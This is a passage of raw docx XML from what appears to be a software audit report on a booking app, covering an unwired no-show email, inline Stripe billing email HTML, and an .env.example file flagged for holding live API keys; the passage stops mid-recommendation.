        <w:t>8.2 No-Show Follow-up — Not Yet Wired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303E351F" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Info</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Status:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> By design (template complete, trigger pending)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D88B143" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>noShowFollowup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> template exists and passes all tests, but there is no API route or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> job that triggers it automatically. It requires a mechanism to detect a no-show (e.g. a booking that remained </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>confirmed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> past its end time without being marked </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>completed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600550B9"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Recommendation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Add a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> job that queries bookings from the previous day with status </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>confirmed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (i.e. never checked in) and triggers the no-show email.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F6ACF0" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6" w:rsidP="00020772">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="40"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="X7cb6682b27151a922176bc79e98491e724db92f"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>8.3 Stripe Billing Emails Use Inline HTML, Not the Shared Template System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005543F7" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Info / Tech debt</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Status:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Functional but inconsistent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621D06DD" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The payment failed and payment receipt emails in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/app/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/stripe/webhook/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>route.ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> use inline HTML strings rather than the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>emailShell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> wrapper and shared template functions. They will not automatically pick up future template-level changes (e.g. branding updates, footer changes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9D259B"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Recommendation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Move the two Stripe billing emails into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>templates.ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>paymentFailed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>paymentReceipt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> functions using the shared </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>emailShell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> wrapper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB85A97" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6" w:rsidP="00020772">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="40"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="env.example-contains-live-api-keys"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>8.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>env</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.example</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Contains Live API Keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64781DEF" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Medium (security hygiene)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Status:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2133CF" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>env</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.example</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> file committed to the repository contains what </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>appear</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to be real, live credentials (</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RESEND_API_KEY</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, Twilio </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ACCOUNT_SID</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AUTH_TOKEN</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CRON_SECRET</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>). Example files should contain placeholder values only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CD922B"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Recommendation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Replace all real values </w:t>
      </w:r>
